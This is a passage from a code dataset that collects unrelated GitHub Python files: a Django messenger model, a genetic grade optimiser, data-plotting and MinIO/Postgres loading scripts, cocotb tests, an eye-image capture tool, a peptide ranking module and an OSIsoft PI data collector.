models.DateField(auto_now_add=True)\n\n class Meta:\n ordering = ['created']\n\n#Crear el Manager de Thread\n\nclass ThreadManager(models.Manager):\n def find(self, user1, user2):\n queryset=self.filter(users=user1).filter(users=user2)\n if len(queryset) > 0:\n return 
queryset[0]\n return None \n def find_or_create(self,user1,user2):\n thread = self.find(user1,user2)\n if thread is not None:\n return thread\n else:\n thread=Thread.objects.create()\n thread.users.add(user1,user2)\n return thread\n\nclass Thread(models.Model):\n users = models.ManyToManyField(User, related_name='threads')\n messages = models.ManyToManyField(Message)\n updated = models.DateTimeField(auto_now=True)\n\n class Meta:\n ordering = ['-updated']\n\n# asociar al objeto Thread el Model Manager\n\n objects = ThreadManager()\n\n#definir la función que va a comprobar cuando un mensaje ha sido modificado\ndef messages_changed(sender,**kwargs):\n instance = kwargs.pop(\"instance\",None)\n action = kwargs.pop(\"action\",None)\n pk_set = kwargs.pop(\"pk_set\",None)\n\n false_pk_set=set()\n\n if action is \"pre_add\":\n for msg_pk in pk_set:\n msg = Message.objects.get(pk=msg_pk)\n if msg.user not in instance.users.all():\n print(\"({}) no é un usuario del hilo\".format(msg.user))\n false_pk_set.add(msg_pk)\n\n instance.save()\n\n pk_set.difference_update(false_pk_set)\n\n#activar la señal\nm2m_changed.connect(messages_changed, sender=Thread.messages.through)\n","repo_name":"spassaro80/CraigScraper","sub_path":"messenger/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1896,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"1230374880","text":"from constrainedRandom import *\r\nfrom sklearn.preprocessing import MinMaxScaler\r\nimport numpy as np\r\n\r\ndef get_random_weight():\r\n \"\"\"\r\n Select a random type of weight (used for mutation)\r\n :return: the string of the randomly selected weight\r\n \"\"\"\r\n rand = random.randint(0, 2)\r\n if rand == 0:\r\n return rand, 'assignment'\r\n elif rand == 1:\r\n return rand, 'quiz'\r\n elif rand == 2:\r\n return rand, 'project'\r\n\r\n\r\nclass DNA:\r\n \"\"\"\r\n Three weightings for the course that need to be adjusted\r\n Should be the grade achieved in each component (e.g. 80, 90, 70)\r\n \"\"\"\r\n assignment_grade = -1\r\n quizzes_grade = -1\r\n project_grade = -1\r\n \"\"\"\r\n Limits to each weight defined as variables\r\n \"\"\"\r\n limits = {\r\n 'assignment': (40, 60),\r\n 'quiz': (10, 30),\r\n 'project': (20, 40)\r\n }\r\n \"\"\"\r\n Mutation rate by %\r\n \"\"\"\r\n mutation_rate = 0.05\r\n\r\n def __init__(self, weights):\r\n self.weights = {\r\n 'assignment': float(weights[0]),\r\n 'quiz': float(weights[1]),\r\n 'project': float(weights[2])\r\n }\r\n self.fitness = self.calculate_fitness()\r\n\r\n def calculate_fitness(self):\r\n \"\"\"\r\n Calculates the fitness of the current DNA\r\n :return: the fitness (i.e. overall grade)\r\n \"\"\"\r\n return \\\r\n DNA.assignment_grade * self.weights['assignment'] + \\\r\n DNA.quizzes_grade * self.weights['quiz'] + \\\r\n DNA.project_grade * self.weights['project']\r\n\r\n def mate(self, dna):\r\n \"\"\"\r\n Mate with another DNA object to create a child\r\n :param dna: the other parent\r\n :return: a DNA object (child) that is the cross over of both DNAs\r\n \"\"\"\r\n new_assignment_weight = (self.weights['assignment'] + dna.weights['assignment']) / 2\r\n new_quizzes_weight = (self.weights['quiz'] + dna.weights['quiz']) / 2\r\n new_project_weight = (self.weights['project'] + dna.weights['project']) / 2\r\n return DNA([new_assignment_weight, new_quizzes_weight, new_project_weight])\r\n\r\n def mutate(self):\r\n \"\"\"\r\n Mutate the DNA. 
Picks a random weight, modifies it by 10% (+ or -).\r\n Then, takes the difference of the new and old one and randomly modifies another weight\r\n (that is not the same) by -1 * the difference. If the constraints are not met,\r\n mutation is cancelled.\r\n :return: None\r\n \"\"\"\r\n # 5% chance of mutation\r\n if random.uniform(0, 1) <= DNA.mutation_rate:\r\n random_index, random_weight = get_random_weight()\r\n limits = tuple(map(lambda x: x/100, DNA.limits[random_weight]))\r\n old_val = self.weights[random_weight]\r\n new_val_upper = old_val * 1.1\r\n new_val_lower = old_val * 0.9\r\n new_val = -1\r\n if new_val_upper <= limits[1]:\r\n new_val = new_val_upper\r\n elif new_val_lower >= limits[0]:\r\n new_val = new_val_lower\r\n\r\n # Make sure new value is not -1\r\n if new_val != -1:\r\n self.weights[random_weight] = new_val\r\n if not self.randomly_modify(-(new_val-old_val), random_index):\r\n self.weights[random_weight] = old_val\r\n else:\r\n self.fitness = self.calculate_fitness()\r\n\r\n def randomly_modify(self, increment, constraint_index):\r\n \"\"\"\r\n Randomly modify a grade weight\r\n :param increment: the increment to modify by (can be negative)\r\n :param constraint_index: the index that shouldn't be modified\r\n :return: True if successful (i.e. within constraint), else False\r\n \"\"\"\r\n i, to_modify = get_random_weight()\r\n while i == constraint_index:\r\n i, to_modify = get_random_weight()\r\n limits = tuple(map(lambda x: x/100, DNA.limits[to_modify]))\r\n change = self.weights[to_modify] + increment\r\n if limits[0] <= change <= limits[1]:\r\n self.weights[to_modify] = change\r\n return True\r\n\r\n return False\r\n\r\n def __repr__(self):\r\n \"\"\"\r\n :return: the string format of the DNA object\r\n \"\"\"\r\n return \\\r\n f\"DNA ({self.weights['assignment']}, {self.weights['quiz']}, {self.weights['project']}), Fit: {self.fitness}\"\r\n\r\n\r\nclass Population:\r\n def __init__(self, pop_size, mutation_prob):\r\n \"\"\"\r\n Initialize a population with the given population size\r\n :param pop_size: the size of the population\r\n :param mutation_prob: the probability of mutation\r\n \"\"\"\r\n self.mutation_prob = mutation_prob\r\n self.pop = []\r\n self.create_first_generation(pop_size)\r\n self.best_dna = None\r\n self.generation = 1\r\n\r\n def create_first_generation(self, pop_size):\r\n \"\"\"\r\n Creates the initial generation by randomly generating\r\n grade weights.\r\n :param pop_size: the size of the population\r\n :return: None\r\n \"\"\"\r\n ranges = [DNA.limits['assignment'], DNA.limits['quiz'], DNA.limits['project']]\r\n cr = ConstrainedRandom(ranges, 100)\r\n for x in range(pop_size):\r\n reduced = list(map(lambda i: i/100, cr.next()))\r\n self.pop.append(DNA(reduced))\r\n\r\n def crossover(self):\r\n \"\"\"\r\n Crosses over all current DNA to create a new population with better (higher fitness) children\r\n :return: None\r\n \"\"\"\r\n # Create mating pool\r\n mating_pool = []\r\n best_dna = self.pop[0]\r\n if self.best_dna is None:\r\n self.best_dna = self.pop[0]\r\n print(self.pop)\r\n\r\n # Prep to create mating_pool\r\n fitness_values = []\r\n for x in range(len(self.pop)):\r\n fitness_values.append(self.pop[x].fitness)\r\n fitness_values = np.asarray(fitness_values).reshape(-1, 1)\r\n scaler = MinMaxScaler()\r\n scaled_fitness_values = list(scaler.fit_transform(fitness_values).flatten())\r\n\r\n for x in range(len(self.pop)):\r\n # record best DNA for generation\r\n if self.pop[x].fitness > best_dna.fitness:\r\n best_dna = self.pop[x]\r\n # 
record best DNA all time\r\n if self.pop[x].fitness > self.best_dna.fitness:\r\n self.best_dna = self.pop[x]\r\n # append based on fitness\r\n for i in range(int(float(scaled_fitness_values[x])*100)):\r\n mating_pool.append(self.pop[x])\r\n\r\n print(f'Best of ALL TIME: {self.best_dna}')\r\n print(f' Best DNA of generation {self.generation}: {best_dna}')\r\n # Create new population\r\n new_pop = []\r\n for x in range(len(self.pop)):\r\n parent_1 = random.choice(mating_pool)\r\n parent_2 = random.choice(mating_pool)\r\n # parent_1 = best_dna\r\n # parent_2 = random.choice(self.pop)\r\n child = parent_1.mate(parent_2)\r\n new_pop.append(child)\r\n\r\n self.pop = new_pop\r\n self.generation += 1\r\n\r\n def mutate(self):\r\n for x in range(len(self.pop)):\r\n self.pop[x].mutate()\r\n\r\n\r\n# Set grades\r\nDNA.assignment_grade = 73\r\nDNA.quizzes_grade = 64\r\nDNA.project_grade = 55\r\n\r\npopulation = Population(100, 0.05)\r\n\r\n# Keep running forever until user stops\r\nwhile True:\r\n population.crossover()\r\n population.mutate()\r\n","repo_name":"RaghavJH/Grade-optimizing-genetic-algorithm","sub_path":"gradeOptimizer.py","file_name":"gradeOptimizer.py","file_ext":"py","file_size_in_byte":7459,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"33719153852","text":"from argparse import ArgumentParser\nimport os\nfrom collections import defaultdict\nfrom pathlib import Path\nfrom matplotlib import pyplot as plt\nimport pickle as pkl\nimport json\n\nCACHE_DIR = \"cache\"\n\ndef main():\n os.makedirs(CACHE_DIR, exist_ok=True)\n\n parser = ArgumentParser()\n parser.add_argument(\"-ts\", \"--test_file\", type=Path, required=True, help=\"Path to test file\")\n parser.add_argument(\"-tr\", \"--train_file\", type=Path, required=True, help=\"Path to train file\")\n parser.add_argument(\"-f\", \"--force\", action=\"store_true\", help=\"Force overwrite cache\")\n parser.add_argument(\"-p\", \"--plot-dir\", type=Path, default=Path(\"plots\"), help=\"Path to plot directory\")\n args = parser.parse_args()\n\n if not args.test_file.exists():\n raise FileNotFoundError(f\"Test file not found: {args.test_file}\")\n\n if not args.train_file.exists():\n raise FileNotFoundError(f\"Train file not found: {args.train_file}\")\n\n cache_file_path = Path(CACHE_DIR) / f\"data-distribution.pkl\"\n\n if cache_file_path.exists() and not args.force:\n print(\"Loading from cache\")\n with open(cache_file_path, \"rb\") as f:\n data = pkl.load(f)\n else:\n max_depth = -1\n\n xd = [\n (args.train_file, defaultdict(int), \"Train\"),\n (args.test_file, defaultdict(int), \"Test\"),\n ]\n\n for file_path, depth_dict, name in xd:\n with file_path.open(\"r\") as f:\n for line in f:\n obj = json.loads(line)\n depth = obj[\"vertexDepth\"]\n max_depth = max(max_depth, depth)\n depth_dict[depth] += 1\n\n data = {}\n for file_path, depth_dict, name in xd:\n histogram = [0] * (max_depth + 1)\n for depth, count in depth_dict.items():\n histogram[depth] = count\n data[name] = histogram\n\n with cache_file_path.open(\"wb\") as f:\n pkl.dump(data, f)\n\n print(\"Plotting\")\n\n plt.rcParams.update({\n 'font.size': 18,\n })\n\n plt.xlabel(\"Depth\")\n plt.ylabel(\"Count\")\n plt.yscale(\"log\")\n\n for key in data:\n plt.plot(data[key], label=key)\n\n plt.legend(loc=\"upper right\")\n plt.tight_layout()\n plt.savefig(args.plot_dir / \"data-distribution.svg\")\n plt.clf()\n\n\nif __name__ == \"__main__\":\n 
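    # main() loads the per-depth counts from cache/data-distribution.pkl when present (unless --force is given), otherwise rebuilds them from the train/test JSONL files, then plots the train and test depth distributions on a log-scale y-axis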
main()\n","repo_name":"Eggie-AI/repo","sub_path":"src/data-distribution.py","file_name":"data-distribution.py","file_ext":"py","file_size_in_byte":2354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"11931549900","text":"\"\"\"Module establishes connection with Minio service, takes csv files from 'newbucket'\nand creates tables inside Postgres database\"\"\"\nfrom os import environ\nimport pandas as pd\nfrom sqlalchemy import create_engine\nfrom minio import Minio\n\n\ndef get_minio_client(host, access, secret):\n \"\"\"Gets Minio client\"\"\"\n\n return Minio(\n host,\n access_key=access,\n secret_key=secret,\n secure=False\n )\n\n\nif __name__ == '__main__':\n # Crete minio client\n minio_host = environ.get(\"MINIO_HOST\")\n minio_key = environ.get(\"MINIO_ACCESS_KEY\")\n minio_secret_key = environ.get(\"MINIO_SECRET_KEY\")\n minio_bucket = environ.get(\"MINIO_BUCKET\")\n minio_client = get_minio_client(minio_host, minio_key, minio_secret_key)\n\n # Establish connection to DB\n db_host = environ.get(\"PG_HOST\")\n user = environ.get(\"POSTGRES_USER\")\n password = environ.get(\"POSTGRES_PASSWORD\")\n db_name = environ.get(\"POSTGRES_DB\")\n conn_string = f'postgresql://{user}:{password}@{db_host}/{db_name}'\n db = create_engine(conn_string)\n conn = db.connect()\n\n # Create table\n objects = minio_client.list_objects(minio_bucket)\n table = pd.DataFrame({'date': [],\n 'state': [],\n 'region_code': [],\n 'region_denomination': [],\n 'province_code': [],\n 'province_denomination': [],\n 'province_abbreviation': [],\n 'lat': [],\n 'long': [],\n 'total_cases': [],\n 'Note': [],\n 'nuts_code_1': [],\n 'nuts_code_2': [],\n 'nuts_code_3': []})\n columns = table.columns.values.tolist()\n for obj in objects:\n minio_obj = minio_client.get_object(minio_bucket, obj.object_name)\n table_pd = pd.read_csv(minio_obj)\n table_pd.columns.values[:] = columns\n table = pd.concat([table, table_pd])\n table.to_sql('covid_ita', con=conn, if_exists='replace', index=False)\n","repo_name":"KirillRizhikov/python_education","sub_path":"DEintrotask/insert_table.py","file_name":"insert_table.py","file_ext":"py","file_size_in_byte":2130,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"20374513016","text":"#!/usr/bin/env python3\r\n\r\n\r\ndef main():\r\n l = list()\r\n n = int(input())\r\n\r\n for i in range(n):\r\n tempList= []\r\n name, num, birth = input().split()\r\n num = int(num)\r\n tempList.append(name)\r\n tempList.append(num)\r\n tempList.append(birth)\r\n l.append(tempList)\r\n \r\n l = sorted(l, key = lambda x: x[1], reverse= True)\r\n\r\n\r\n print()\r\n print(l)\r\n\r\n \r\n for i in range(len(l)):\r\n print(i)\r\n curr = l[i][2]\r\n #print(\"CURR ------> {}\".format(curr))\r\n for j in range (len(l)-1):\r\n if i == j:\r\n continue\r\n #print(len(l))\r\n print(\"{} {}\".format(i, j))\r\n compare = l[j][2]\r\n #print(\" COMPARE ------> {}\".format(compare))\r\n if curr == compare:\r\n print(\"SAME DATE\")\r\n #print(\"{} {}\".format(l[i], l[j]))\r\n if l[i][1] > l[j][1]:\r\n l.remove(l[j])\r\n else:\r\n l.remove(l[i])\r\n \r\n print(\"NEW LIST: {}\".format(l))\r\n \r\n \r\n print(len(l))\r\n for i in l:\r\n print(i[0])\r\n\r\n\r\nif __name__ == \"__main__\":\r\n 
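    # main() sorts entries by the numeric field in descending order, then removes same-birthday duplicates, keeping the entry with the larger number; note that removing from the list while iterating over its indices can skip elements or raise IndexError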
main()","repo_name":"tlittle2/Kattis-Solutions-Python","sub_path":"BirthdayMemorization/birthday.py","file_name":"birthday.py","file_ext":"py","file_size_in_byte":1206,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"34332422674","text":"from cocotb_test.simulator import run, Icarus\nfrom cocotb_test import simulator\n\n\nclass IcarusAutoTimescale(Icarus):\n def compile_command(self):\n with open(self.sim_dir + \"/cmds.f\", \"w\") as f:\n f.write(\"+timescale+1ns/1ns\\n\")\n self.compile_args.extend([\"-f\", self.sim_dir + \"/cmds.f\"])\n return super().compile_command()\n\n\n# simulator.Icarus = IcarusAutoTimescale\n\ndef test_fen_decode():\n run(\n verilog_sources=[\n \"hw/fen_decode.sv\",\n \"hw/ascii_int_to_bin.sv\",\n \"hw/onehot_to_bin.v\",\n ],\n toplevel=\"fen_decode\",\n module=\"cocotb_fen_decode\",\n )\n\ndef test_psudo_legal_moves():\n run(\n verilog_sources=[\n \"hw/onehot_to_bin.v\",\n \"hw/onehot_from_bin.v\",\n \"hw/psudolegal_board.sv\",\n \"hw/movegen_square.sv\",\n \"hw/movegen_lookup_output.sv\",\n \"hw/movegen_rankfile.sv\",\n \"hw/movegen_piece_stack.sv\",\n \"hw/arbiter.v\",\n ],\n toplevel=\"psudolegal_board\",\n module=\"cocotb_psudolegal_board\",\n waves=True,\n )\n\n\n","repo_name":"shuckc/fpgachess","sub_path":"tests/test_hw.py","file_name":"test_hw.py","file_ext":"py","file_size_in_byte":1123,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"42201366839","text":"from rss_feed_parser import RssFeedParser\nfrom multiprocessing import Pool\nfrom writers import MongoWriter\nimport time\n\ndef run(art):\n art.download_and_parse()\n return art\n\ndef write(args):\n art, host, port = args\n writer = MongoWriter(host, port)\n writer.write(art)\n return True\n\ndef main():\n start = time.time()\n f = RssFeedParser('http://rss.cnn.com/rss/cnn_topstories.rss')\n arts = f.get_new_articles()\n p = Pool(5)\n parsed = p.map(run, arts)\n print('fetched', len(arts), 'in ', time.time() - start, 'seconds')\n start = time.time()\n p.map(write, [(art, 'localhost', 27017) for art in parsed])\n print('wrote', len(arts), 'in ', time.time() - start, 'seconds')\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"gt-big-data/retina-crawler","sub_path":"test_multiprocessing.py","file_name":"test_multiprocessing.py","file_ext":"py","file_size_in_byte":748,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"48"} +{"seq_id":"16362905400","text":"from imutils import face_utils\nimport dlib\nimport cv2\nimport os\nimport glob\n\n\ndetector = dlib.get_frontal_face_detector()\npredictor = dlib.shape_predictor(os.path.join('data', 'shape_predictor_68_face_landmarks.dat'))\n\ncap = cv2.VideoCapture(0)\n\nmode = 'train'\n\n\nfiles = glob.glob(os.path.join('data', 'dataset', f'{mode}_imgs', '*.png'))\nname = int(files[-1].split('.')[-2].split('_')[-1])+1\n\nwhile True:\n ret, frame = cap.read()\n image = cv2.flip(frame, +1)\n gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n rects = detector(gray, 1)\n\n leftXs = []\n leftYs = []\n rightXs = []\n rightYs = []\n\n for (i, rect) in enumerate(rects):\n shape = predictor(gray, rect)\n shape = face_utils.shape_to_np(shape)\n\n for x, y in shape[36:42]:\n leftXs.append(x)\n leftYs.append(y)\n for x, y in shape[42:48]:\n rightXs.append(x)\n rightYs.append(y)\n\n key = cv2.waitKey(1)\n if key == 27:\n break\n\n if leftXs.__len__() > 0:\n left = image[min(leftYs) - 5:max(leftYs) + 5, 
min(leftXs) - 5:max(leftXs) + 5]\n right = image[min(rightYs) - 5:max(rightYs) + 5, min(rightXs) - 5:max(rightXs) + 5]\n\n left = cv2.resize(left, (120, 60))\n right = cv2.resize(right, (120, 60))\n right = cv2.flip(right, +1)\n\n if key == 32:\n cv2.imwrite(os.path.join('data', 'dataset', f'{mode}_imgs', f'eye_{name}.png', left))\n cv2.imwrite(os.path.join('data', 'dataset', f'{mode}_imgs', f'eye_{name+1}.png', right))\n print(\"Take eyeshot!\")\n name += 2\n elif key == ord('q'):\n break\n\n cv2.imshow('All', image)\n\ncap.release()\ncv2.destroyAllWindows()\n","repo_name":"bartoszptak/Gaze_Points_Dataset_Model","sub_path":"Cutter_eye.py","file_name":"Cutter_eye.py","file_ext":"py","file_size_in_byte":1717,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"74252090704","text":"import os\nimport uuid\nfrom azure.storage.blob import BlobServiceClient, BlobClient, ContainerClient, __version__\n\n# Retrieve the connection string for use with the application. The storage\n# connection string is stored in an environment variable on the machine\n# running the application called AZURE_STORAGE_CONNECTION_STRING. If the environment variable is\n# created after the application is launched in a console or with Visual Studio,\n# the shell or application needs to be closed and reloaded to take the\n# environment variable into account.\nconnect_str = os.getenv('AZURE_STORAGE_CONNECTION_STRING')\n\n# Create the BlobServiceClient object which will be used to create a container client\nblob_service_client = BlobServiceClient.from_connection_string(connect_str)\n\n# path to blob to upload\ncwd = os.getcwd()\nblob_file = \"mc_1000_byte_cog.tif\"\nupload_file_path = os.path.join(cwd, blob_file)\n\n# Create a blob client using the local file name as the name for the blob\ncontainer_name = \"baselayer\"\nblob_client = blob_service_client.get_blob_client(container=container_name, blob=blob_file)\n\n# Upload the created file\nwith open(upload_file_path, \"rb\") as data:\n blob_client.upload_blob(data)\n\n","repo_name":"jmad1v07/natgeo-temp-webmap","sub_path":"cog/azureblob.py","file_name":"azureblob.py","file_ext":"py","file_size_in_byte":1196,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"8217544906","text":"#!/usr/bin/python3.5\n# -*- coding: utf-8 -*-\nfrom __future__ import absolute_import, print_function, unicode_literals\n\nimport os\nimport sys\nfrom os.path import exists\nfrom os.path import join\nfrom os.path import dirname\nfrom os.path import abspath\n\n\nif __name__ == \"__main__\":\n base_path = dirname(dirname(abspath(__file__)))\n print(\"Project path: {0}\".format(base_path))\n env_path = join(base_path, \".tox\", \"bootstrap\")\n if sys.platform == \"win32\":\n bin_path = join(env_path, \"Scripts\")\n else:\n bin_path = join(env_path, \"bin\")\n if not exists(env_path):\n import subprocess\n print(\"Making bootstrap env in: {0} ...\".format(env_path))\n try:\n subprocess.check_call([\"virtualenv\", env_path, '--python=python3.5'])\n except Exception:\n subprocess.check_call([sys.executable, \"-m\", \"virtualenv\", env_path, '--python=python3.5'])\n print(\"Installing `jinja2` and `matrix` into bootstrap environment ...\")\n subprocess.check_call([join(bin_path, \"pip\"), \"install\", \"jinja2\", \"matrix\", \"pyyaml\"])\n activate = join(bin_path, \"activate_this.py\")\n exec(compile(open(activate, \"rb\").read(), activate, \"exec\"), dict(__file__=activate))\n\n import 
jinja2\n import matrix\n import yaml\n\n jinja = jinja2.Environment(\n loader=jinja2.FileSystemLoader(join(base_path, \"ci\", \"templates\")),\n trim_blocks=True,\n lstrip_blocks=True,\n keep_trailing_newline=True\n )\n tox_environments = {}\n for name in os.listdir(join(base_path, \"ci\", \"envs\")):\n os.unlink(join(base_path, \"ci\", \"envs\", name))\n\n for (alias, conf) in matrix.from_file(join(base_path, \"ci\", \"setup.cfg\")).items():\n tox_environments[alias] = conf\n conf['repo_name'] = 'python-nameless'\n conf['package_name'] = 'nameless'\n with open(join(base_path, \"ci\", \"envs\", alias + '.cookiecutterrc'), \"w\") as fh:\n fh.write(yaml.safe_dump(\n dict(default_context={k: v for k, v in conf.items() if v}),\n default_flow_style=False\n ))\n for name in os.listdir(join(base_path, \"ci\", \"templates\")):\n with open(join(base_path, name), \"w\") as fh:\n fh.write(jinja.get_template(name).render(tox_environments=tox_environments))\n print(\"Wrote {}\".format(name))\n print(\"DONE.\")\n","repo_name":"numengo/cc-py-setup","sub_path":"ci/bootstrap.py","file_name":"bootstrap.py","file_ext":"py","file_size_in_byte":2355,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"1121029072","text":"########################################################################################\n# Script to rank the peptides & compare them to known peptide files.\n# Made by Shane Pullens, Utrecht University - Theoretical bioinformatics.\n# Version 1.0\n########################################################################################\n\n# Imports\nimport pandas as pd\nfrom pathlib import Path\n\nproject_dir = Path.cwd()\n\n\ndef main():\n return None\n\n\ndef peptide_filtering(df, cutoff_percentage, absolute_cutoff=0, inclusive=True):\n \"\"\"\n This function will compare the found cryptic peptides to the canonical peptides, any overlap will result in removal\n of the cryptic peptide from the list, since it can also be a canonical peptide.\n :param df: Dataframe containing obtained peptides:\n :param: cutoff_percentage: cutoff for top x percentage of the peptides.\n :param: absolute_cutoff: when not null, absolute number of peptides is used instead of percentage.\n :param mode: definition of cryptic or canonical mode, known peptides lists will be used accordingly.\n :return: 3 lists of peptides; 1: list of wrongly classified peptides, 2: list of known peptides, 3: list of newly, not classified peptides.\n \"\"\"\n top_df = pd.DataFrame()\n percentage_mode = True\n df = df.sort_values(by=['%Rank_EL'])\n\n # When an absolute cutoff has been selected, it will overrule the percentage cutoff.\n if absolute_cutoff != 0:\n percentage_mode = False\n\n # Save top x% of the best ranking peptides\n if percentage_mode:\n print('Using percentage cutoff')\n cutoff_quantile = cutoff_percentage / 100\n df_cutoff = df['%Rank_EL'].quantile(cutoff_quantile)\n df_mask = df['%Rank_EL'] <= df_cutoff\n top_df = df[df_mask]\n\n # Save top x number of best ranking peptides.\n elif not percentage_mode:\n print('Using absolute cutoff')\n top_df = df[:absolute_cutoff]\n\n # Inclusive mode checks if there are peptides that fall out of scope due to the threshold, but have the same rank.\n # When the same rank is detected, they are still added to the candidate list, overruling the threshold.\n if inclusive:\n print('Inclusive mode enabled, adding all peptides with same EL rank as peptides in selected scope...')\n same_rank = top_df['%Rank_EL'].max()\n top_df = 
df[df['%Rank_EL'] <= same_rank]\n return top_df\n\n\ndef peptide_comparison(df, hla, mode='cryp'):\n \"\"\"\n This method compares our candidate peptides with known peptides from our database.\n If they are found, they are moved from the candidate list to the false positive list.\n :param df: list of candidate peptides\n :param hla: HLA molecule to compare to\n :param mode: Either \"cryp\" or \"can\", internal flag to select cryptic or canonical peptide database.\n :return df: filtered candidate peptide list with solely unknown peptides\n :return confirmed_canonical: peptide list of peptides that have been found in other literature.\n \"\"\"\n text = ''\n if mode == 'can':\n text = 'Canonical'\n elif mode == 'cryp':\n text = 'Cryptic'\n\n print(f'Comparing {hla} peptides with known, {text} peptide database...')\n global project_dir\n comparison_df = pd.DataFrame()\n confirmed_canonical = pd.DataFrame()\n if hla == 'HLA-A01':\n if mode == 'cryp':\n comparison_df = pd.read_csv(Path(project_dir / 'Data' / 'Known_peptides' / 'HLA-A01_cryptic.csv'))\n elif mode == 'can':\n comparison_df = pd.read_csv(Path(project_dir / 'Data' / 'Known_peptides' / 'HLA-A01_canonical.csv'))\n elif hla == 'HLA-A02':\n if mode == 'cryp':\n comparison_df = pd.read_csv(Path(project_dir / 'Data' / 'Known_peptides' / 'HLA-A02_cryptic.csv'))\n elif mode == 'can':\n comparison_df = pd.read_csv(Path(project_dir / 'Data' / 'Known_peptides' / 'HLA-A02_canonical.csv'))\n\n try:\n merged_df = pd.merge(df, comparison_df, on=['Peptide'], how='inner')\n print('Canonical peptides have been detected! Removing from list...')\n confirmed_canonical = df[df['Peptide'].isin(merged_df['Peptide'])]\n print(confirmed_canonical.shape)\n best_ranking_peptides = df[~df['Peptide'].isin(merged_df['Peptide'])] # Removed all known canonical peptides\n df = best_ranking_peptides\n except:\n print('No known peptides have been found, saving peptides...')\n\n return df, confirmed_canonical\n\nif __name__ == \"__main__\":\n main()","repo_name":"Sjonnie404/NeoPipeline","sub_path":"Scripts/Peptide_selection.py","file_name":"Peptide_selection.py","file_ext":"py","file_size_in_byte":4509,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"3935694368","text":"import json\r\nimport requests\r\nimport sys\r\nimport os\r\nsys.path.append('C:\\\\Program Files (x86)\\\\PIPC\\\\AF\\\\PublicAssemblies\\\\4.0\\\\')\r\nimport clr\r\nclr.AddReference('OSIsoft.AFSDK')\r\nimport time\r\nimport datetime\r\nfrom datetime import datetime\r\nimport psutil\r\nimport pytz\r\nimport schedule\r\n\r\nfrom OSIsoft.AF.PI import *\r\nfrom OSIsoft.AF.Search import *\r\nfrom OSIsoft.AF.Asset import *\r\nfrom OSIsoft.AF.Data import *\r\nfrom OSIsoft.AF.Time import *\r\nfrom System.Net import NetworkCredential # by default by window\r\n\r\ntbeServerIp = \"xxx.xx.xx.xx\"\r\ntbeServerName = \"XXX\"\r\ntbeServerUser = \"pidemo\" #pidemo only\r\n\r\ntbpServerIp = \"xxx.xx.xx.xx\"\r\ntbpServerName = \"XXX\"\r\ntbpServerUser = \"pidemo\" #pidemo and piuser\r\n\r\npppServerIp = \"xxx.xx.xx.xx\"\r\npppServerName = \"XXX\"\r\npppServerUser = \"pidemo\" #pidemo only\r\n\r\nsevServerIp = \"xxx.xx.xx.xx\"\r\nsevServerName = \"XXX\"\r\nsevServerUser = \"piuser\" #pidemo and piuser\r\n\r\ndef connect_to_Server(serverName, serverUser):\r\n try:\r\n piServers = PIServers()\r\n global piServer\r\n piServer = piServers[serverName]\r\n # print(piServer)\r\n serverCred = NetworkCredential(serverUser, None)\r\n connection = 
piServer.Connect(serverCred)\r\n # print(piServer.ConnectionInfo.IsConnected)\r\n except Exception as e:\r\n print(e)\r\n return\r\n\r\ndef get_tag_lastvalue(tagname):\r\n try:\r\n tag = PIPoint.FindPIPoint(piServer, tagname)\r\n\r\n # last value \r\n # like a CurrentValue() there are many more methods available on internet you can find\r\n #print(\"tagvalue\",tag)\r\n\r\n last_value = tag.CurrentValue()\r\n #print(\"last_value\",last_value)\r\n\r\n if type(last_value.Value) == float or type(last_value.Value) == int:\r\n previous_data = last_value.Value\r\n print(\"store previous data =\", previous_data)\r\n return last_value.Value\r\n else:\r\n # return last_value.Value.Value\r\n print(\"display previous data\")\r\n return previous_data\r\n\r\n except Exception as e:\r\n print(tagname, \" --> \", e)\r\n return\r\n\r\ndef collect_data():\r\n \r\n connect_to_Server(tbeServerIp, tbeServerUser)\r\n tbe_tag = \"XXXXXXX\"\r\n tbe_value = get_tag_lastvalue(tbe_tag)\r\n\r\n connect_to_Server(pppServerIp, pppServerUser)\r\n ppp_tag = \"XXXXXXX\"\r\n ppp_value = get_tag_lastvalue(ppp_tag)\r\n \r\n connect_to_Server(tbpServerIp, tbpServerUser)\r\n tbp_tag10 = \"XXXXXXX\"\r\n tbp_tag20 = \"XXXXXXX\"\r\n tbp_tag30 = \"XXXXXXX\"\r\n tbp_value10 = get_tag_lastvalue(tbp_tag10)\r\n tbp_value20 = get_tag_lastvalue(tbp_tag20)\r\n tbp_value30 = get_tag_lastvalue(tbp_tag30)\r\n\r\n connect_to_Server(sevServerIp, sevServerUser)\r\n sev_tag1 = \"XXXXXXX\"\r\n sev_tag2 = \"XXXXXXX\"\r\n sev_value1 = get_tag_lastvalue(sev_tag1)\r\n sev_value2 = get_tag_lastvalue(sev_tag2)\r\n\r\n #Total Generation \r\n\r\n plantName = [\"XXX\", \"XXX\", \"XXX\", \"XXX\"]\r\n cityName = [\"XXX\", \"XXX\", \"XXX\", \"XXX\"]\r\n latitude = [XXXX, XXXX, XXXX, XXXX]\r\n longitude = [XXXX, XXXX, XXXX, XXXX]\r\n powerGeneration1 = [tbe_value, tbp_value10, ppp_value, sev_value1]\r\n powerGeneration2 = [0, tbp_value20, 0, sev_value2]\r\n powerGeneration3 = [0, tbp_value30, 0, 0]\r\n \r\n json_data = []\r\n for i in 